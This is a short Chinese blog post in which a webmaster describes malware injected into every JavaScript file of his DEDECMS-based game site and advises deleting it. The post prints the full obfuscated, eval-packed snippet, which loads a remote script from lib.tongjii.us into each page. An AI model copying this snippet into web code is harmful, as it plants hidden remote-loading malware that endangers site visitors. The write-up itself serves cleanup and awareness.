当前位置:首页 > 计算机相关 > 建站之路 > 正文内容

lib.tongjii.us 病毒分析 DEDECMS被植入此病毒

piikee5年前 (2017-06-17)建站之路228
很久以前,369手游网一直打开被谷歌浏览器提示提示页面有病毒,一开始以为自己浏览器被什么病毒劫持或者DNS劫持。最近重启369手游网,又出现这个问题,分析了一下找到了原因。原来是网站被植入病毒了。所有JS页面都被放入这段代码:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('12(T(p,a,c,k,e,d){e=T(c){U(c<a?\'\':e(1f(c/a)))+((c=c%a)>1e?W.1d(c+1h):c.13(11))};X(!\'\'.V(/^/,W)){Y(c--){d[e(c)]=k[c]||e(c)}k=[T(e){U d[e]}];e=T(){U\'\\\\w+\'};c=1};Y(c--){X(k[c]){p=p.V(10 14(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}U p}(\'v(l(p,a,c,k,e,d){e=l(c){m c.n(z)};q(!\\\'\\\'.t(/^/,B)){r(c--){d[c.n(a)]=k[c]||c.n(a)}k=[l(e){m d[e]}];e=l(){m\\\'\\\\\\\\w+\\\'};c=1};r(c--){q(k[c]){p=p.t(C D(\\\'\\\\\\\\b\\\'+e(c)+\\\'\\\\\\\\b\\\',\\\'g\\\'),k[c])}}m p}(\\\'1 4=4||[];(b(){1 2=5.e(\\\\\\\'7\\\\\\\');2.a=\\\\\\\'8://9.d.f/k.6?//i.6?g\\\\\\\';1 3=5.j(\\\\\\\'7\\\\\\\')[0];3.h.c(2,3)})();\\\',o,o,\\\'|y|u|s|E|x|A|G|Q|N|P|l|R|S|O|L|M|F|H|I|K\\\'.J(\\\'|\\\'),0,{}))\',Z,Z,\'|||||||||||||||||||||T|U|13|17||X|Y||V|1m|12||1q|1r|11|1n|W|10|14|1l|1o|1c|1k|1i|15|1j|1s|1p|1g|19|18|16|1b|1a\'.15(\'|\'),0,{}))',62,91,'|||||||||||||||||||||||||||||||||||||||||||||||||||||||function|return|replace|String|if|while|55|new|36|eval|toString|RegExp|split|http|21|src|createElement|tongjii|insertBefore|script|fromCharCode|35|parseInt|lib|29|getElementsByTagName|tj|google|_hmt_en|hm_en|js|parentNode|41d12a21b4e1a726d4a651685b118811662033874|document|var|us'.split('|'),0,{}))

解决办法:
所有JS文件查找一下这段代码删除即可。。

扫描二维码推送至手机访问。

版权声明:本文由萍客小居发布,如需转载请注明出处。

本文链接:https://www.piikee.net/1259.html

分享给朋友:

相关文章

改变新云4.0首页默认菜单

新云系统的首页默认菜单式是下载频道的,如果要改变为文章频道菜单,可以到包含文件中的header.html里面,找到[code]<li class="current"><a href="/" target="_top">...

使用godaddy的免费DNS进行域名管理解析(Off-Site DNS)

使用godaddy的免费DNS进行域名管理解析(Off-Site DNS)

GoDaddy 是全世界相当知名的网域名称?册商,同时也提供虚拟主机(Hosting)、电子邮件(Email)、SSL Certificates 等等服务。不管你的网域名称是不是在 GoDaddy ?册,都可以使用 GoDaddy 提供的免...

DEDECMS淘宝客合作版无法采集商品的原因

DEDECMS的淘宝客合作版,看起来很不错,结果弄了几天,一直无法采集。本地调试还可以的,上传到空间就无法采集了,每次点击展开,选择分类商品之后,页面就空白没反应了。最后才发现,原来是服务器的PHP版本太旧了!!!登录DEDECMS的后台,...

asp站点com1.gupiao.asp,prn.gupiao.asp木马清除方法

很不幸,不知什么时候网站被挂马了!网站的跟目录被加了几个文件,怎么删也删不掉,而且过一段时间还会自动在 ASP 的网站首页插一段<div class=sera><ul><li style='float:left...

PHP168 B2B系统 自定义 MYSQL万能标签

PHP168很强悍,但是标签还不是很完善。最近弄首页标签,有些标签模块都没出效果,只好自己研究MYSQL万能标签了。弄个日志来记记这些标签吧。招聘标签:最新10个企业招聘信息(获得id,企业名,发布时间)MYSQLSELECT jobs_i...

Godaddy空间绑定多个域名的方法

1,先到 Domain names-->off-site DNS2,点击add domains3,写入你要加入绑定的域名4,等待系统设定完成5,回到主机管理6,点击主机的OPEN7,点击别名设定8,点击加入别名9,选择你刚刚加入的域名...

lillian
lillian
5年前 (2018-01-12)

赞!

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。